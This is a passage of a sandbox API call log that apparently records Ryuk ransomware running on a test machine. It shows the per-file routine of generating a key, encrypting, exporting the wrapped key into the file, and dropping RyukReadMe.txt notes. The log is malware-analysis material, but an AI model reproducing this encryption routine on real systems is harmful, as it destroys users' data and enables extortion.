lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0156.542] CloseHandle (hObject=0x18c) returned 1 [0156.573] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.577] CryptDestroyKey (hKey=0x3b8690) returned 1 [0156.577] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.577] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.577] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0156.578] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url", dwFileAttributes=0x80) returned 1 [0156.578] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0156.578] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=133) returned 1 [0156.578] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=133) returned 1 [0156.578] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0156.578] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0156.578] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.579] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x85, lpOverlapped=0x0) returned 1 [0156.580] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0156.580] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x85, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x90) returned 1 [0156.580] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.580] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x90, lpOverlapped=0x0) returned 1 [0156.580] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0156.580] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.580] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.580] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0156.580] CloseHandle (hObject=0x18c) returned 1 [0156.598] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.602] CryptDestroyKey (hKey=0x3b8690) returned 1 [0156.602] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.603] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.603] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0156.603] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url", dwFileAttributes=0x80) returned 1 [0156.603] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0156.603] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=134) returned 1 [0156.604] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=134) returned 1 [0156.604] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0156.604] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0156.604] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.604] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x86, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x86, lpOverlapped=0x0) returned 1 [0156.605] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0156.605] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x86, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x90) returned 1 [0156.605] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.605] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x90, lpOverlapped=0x0) returned 1 [0156.605] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0156.605] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.605] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.605] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0156.605] CloseHandle (hObject=0x18c) returned 1 [0156.624] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.628] CryptDestroyKey (hKey=0x3b8690) returned 1 [0156.628] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.628] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0156.628] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0156.628] SetLastError (dwErrCode=0x0) [0156.628] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0156.629] GetLastError () returned 0x0 [0156.629] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0156.630] CloseHandle (hObject=0x188) returned 1 [0156.630] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0156.630] SetLastError (dwErrCode=0x0) [0156.630] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0156.630] GetLastError () returned 0xb7 [0156.630] CloseHandle (hObject=0x188) returned 1 [0156.630] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0156.632] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.632] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.632] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0156.632] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url", dwFileAttributes=0x80) returned 1 [0156.633] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0156.633] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=133) returned 1 [0156.633] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=133) returned 1 [0156.633] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0156.633] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0156.633] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.633] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x85, lpOverlapped=0x0) returned 1 [0156.634] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0156.634] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x85, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x90) returned 1 [0156.634] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.634] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x90, lpOverlapped=0x0) returned 1 [0156.634] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0156.634] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.634] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.634] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0156.634] CloseHandle (hObject=0x18c) returned 1 [0156.652] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.657] CryptDestroyKey (hKey=0x3b8690) returned 1 [0156.657] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.657] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.657] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0156.657] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url", dwFileAttributes=0x80) returned 1 [0156.657] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0156.658] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=133) returned 1 [0156.658] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=133) returned 1 [0156.658] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0156.658] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0156.658] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.658] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x85, lpOverlapped=0x0) returned 1 [0156.659] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0156.659] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x85, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x90) returned 1 [0156.659] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.659] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x90, lpOverlapped=0x0) returned 1 [0156.659] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0156.660] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.660] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.660] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0156.660] CloseHandle (hObject=0x18c) returned 1 [0156.677] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.682] CryptDestroyKey (hKey=0x3b8690) returned 1 [0156.682] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.682] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.682] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0156.682] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url", dwFileAttributes=0x80) returned 1 [0156.683] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0156.683] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=133) returned 1 [0156.683] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=133) returned 1 [0156.683] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0156.683] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0156.683] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.683] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x85, lpOverlapped=0x0) returned 1 [0156.684] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0156.684] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x85, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x90) returned 1 [0156.684] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.684] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x90, lpOverlapped=0x0) returned 1 [0156.684] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0156.684] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.684] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.684] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0156.685] CloseHandle (hObject=0x18c) returned 1 [0156.715] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.719] CryptDestroyKey (hKey=0x3b8690) returned 1 [0156.719] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.719] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.719] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0156.720] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url", dwFileAttributes=0x80) returned 1 [0156.720] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0156.720] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=133) returned 1 [0156.720] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=133) returned 1 [0156.720] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0156.720] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0156.721] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.721] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x85, lpOverlapped=0x0) returned 1 [0156.722] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0156.722] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x85, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x90) returned 1 [0156.722] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.722] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x90, lpOverlapped=0x0) returned 1 [0156.722] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0156.722] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.722] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.722] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0156.722] CloseHandle (hObject=0x18c) returned 1 [0156.739] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.743] CryptDestroyKey (hKey=0x3b8690) returned 1 [0156.743] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.744] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.744] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0156.744] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url", dwFileAttributes=0x80) returned 1 [0156.744] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0156.744] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=133) returned 1 [0156.745] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=133) returned 1 [0156.745] 